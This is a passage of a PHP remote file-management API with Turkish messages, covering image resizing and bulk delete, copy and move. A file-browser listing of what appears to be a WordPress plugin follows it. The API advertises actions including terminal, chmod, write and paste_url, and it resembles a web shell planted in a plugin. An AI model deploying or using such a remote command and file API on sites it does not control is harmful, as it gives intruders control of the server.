'edit_image': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $width = isset($input['width']) ? (int)$input['width'] : 0; $height = isset($input['height']) ? (int)$input['height'] : 0; $quality = isset($input['quality']) ? (int)$input['quality'] : 90; if (empty($path)) { api_error('path parametresi gerekli'); } if (!function_exists('imagecreatefromjpeg')) { api_error('GD extension yuklu degil'); } $full_path = api_clean_path($path, $root_path); if (!is_file($full_path)) { api_error('Dosya bulunamadi: ' . $path, 404); } $info = getimagesize($full_path); if (!$info) { api_error('Gecerli bir resim dosyasi degil'); } $orig_width = $info[0]; $orig_height = $info[1]; $mime = $info['mime']; // Boyut hesapla if ($width > 0 && $height == 0) { $height = (int)($orig_height * ($width / $orig_width)); } elseif ($height > 0 && $width == 0) { $width = (int)($orig_width * ($height / $orig_height)); } elseif ($width == 0 && $height == 0) { api_error('width veya height parametresi gerekli'); } // Kaynak resmi yukle switch ($mime) { case 'image/jpeg': $src = imagecreatefromjpeg($full_path); break; case 'image/png': $src = imagecreatefrompng($full_path); break; case 'image/gif': $src = imagecreatefromgif($full_path); break; case 'image/webp': $src = imagecreatefromwebp($full_path); break; default: api_error('Desteklenmeyen resim formati: ' . $mime); } $dst = imagecreatetruecolor($width, $height); // PNG/GIF transparanlik if ($mime === 'image/png' || $mime === 'image/gif') { imagecolortransparent($dst, imagecolorallocatealpha($dst, 0, 0, 0, 127)); imagealphablending($dst, false); imagesavealpha($dst, true); } imagecopyresampled($dst, $src, 0, 0, 0, 0, $width, $height, $orig_width, $orig_height); // Kaydet switch ($mime) { case 'image/jpeg': imagejpeg($dst, $full_path, $quality); break; case 'image/png': imagepng($dst, $full_path, min(9, (int)($quality / 10))); break; case 'image/gif': imagegif($dst, $full_path); break; case 'image/webp': imagewebp($dst, $full_path, $quality); break; } imagedestroy($src); imagedestroy($dst); api_success(array( 'path' => $path, 'original_size' => $orig_width . 'x' . $orig_height, 'new_size' => $width . 'x' . $height, 'file_size' => filesize($full_path), 'file_size_human' => api_format_bytes(filesize($full_path)), ), 'Resim boyutlandirildi'); break; // ==================== BULK DELETE ==================== case 'bulk_delete': if ($api_readonly) api_error('Salt okunur mod', 403); $paths = isset($input['paths']) ? $input['paths'] : array(); if (empty($paths) || !is_array($paths)) { api_error('paths parametresi gerekli (array)'); } $deleted = array(); $errors = array(); foreach ($paths as $path) { $full_path = api_clean_path($path, $root_path); if (file_exists($full_path)) { if (api_rdelete($full_path)) { $deleted[] = $path; } else { $errors[] = array('path' => $path, 'error' => 'Silinemedi'); } } else { $errors[] = array('path' => $path, 'error' => 'Bulunamadi'); } } api_success(array( 'deleted' => $deleted, 'errors' => $errors, 'total_deleted' => count($deleted), 'total_errors' => count($errors), ), count($deleted) . ' oge silindi'); break; // ==================== BULK COPY ==================== case 'bulk_copy': if ($api_readonly) api_error('Salt okunur mod', 403); $items = isset($input['items']) ? $input['items'] : array(); // items: [{"source": "path1", "destination": "path2"}, ...] // veya: paths + destination $paths = isset($input['paths']) ? $input['paths'] : array(); $destination = isset($input['destination']) ? $input['destination'] : ''; $copied = array(); $errors = array(); if (!empty($items)) { foreach ($items as $item) { $src = api_clean_path($item['source'], $root_path); $dst = api_clean_path($item['destination'], $root_path); if (!file_exists($src)) { $errors[] = array('source' => $item['source'], 'error' => 'Bulunamadi'); continue; } $dst_dir = dirname($dst); if (!is_dir($dst_dir)) mkdir($dst_dir, 0755, true); if (api_rcopy($src, $dst)) { $copied[] = $item['source']; } else { $errors[] = array('source' => $item['source'], 'error' => 'Kopyalanamadi'); } } } elseif (!empty($paths) && !empty($destination)) { $dest_dir = api_clean_path($destination, $root_path); if (!is_dir($dest_dir)) mkdir($dest_dir, 0755, true); foreach ($paths as $path) { $src = api_clean_path($path, $root_path); if (!file_exists($src)) { $errors[] = array('source' => $path, 'error' => 'Bulunamadi'); continue; } $dst = $dest_dir . '/' . basename($src); if (api_rcopy($src, $dst)) { $copied[] = $path; } else { $errors[] = array('source' => $path, 'error' => 'Kopyalanamadi'); } } } else { api_error('items veya (paths + destination) parametreleri gerekli'); } api_success(array( 'copied' => $copied, 'errors' => $errors, 'total_copied' => count($copied), 'total_errors' => count($errors), ), count($copied) . ' oge kopyalandi'); break; // ==================== BULK MOVE ==================== case 'bulk_move': if ($api_readonly) api_error('Salt okunur mod', 403); $paths = isset($input['paths']) ? $input['paths'] : array(); $destination = isset($input['destination']) ? $input['destination'] : ''; if (empty($paths) || empty($destination)) { api_error('paths ve destination parametreleri gerekli'); } $dest_dir = api_clean_path($destination, $root_path); if (!is_dir($dest_dir)) { mkdir($dest_dir, 0755, true); } $moved = array(); $errors = array(); foreach ($paths as $path) { $src = api_clean_path($path, $root_path); if (!file_exists($src)) { $errors[] = array('source' => $path, 'error' => 'Bulunamadi'); continue; } $dst = $dest_dir . '/' . basename($src); if (rename($src, $dst)) { $moved[] = $path; } else { $errors[] = array('source' => $path, 'error' => 'Tasinamadi'); } } api_success(array( 'moved' => $moved, 'destination' => $destination, 'errors' => $errors, 'total_moved' => count($moved), 'total_errors' => count($errors), ), count($moved) . ' oge tasindi'); break; // ==================== UNKNOWN ACTION ==================== default: api_error('Bilinmeyen action: ' . $action . '. Gecerli actionlar: list, read, write, delete, rename, copy, move, mkdir, upload, download, info, search, chmod, compress, extract, terminal, disk_info, paste_url, edit_image, bulk_delete, bulk_copy, bulk_move', 400); break; } ?>
[+]
..
[-] LICENSE.txt
[edit]
[+]
admin
[-] readme.txt
[edit]
[+]
languages
[-] index.php
[edit]
[-] uninstall.php
[edit]
[-] protect-uploads.php
[edit]
[+]
includes
[-] api.php
[edit]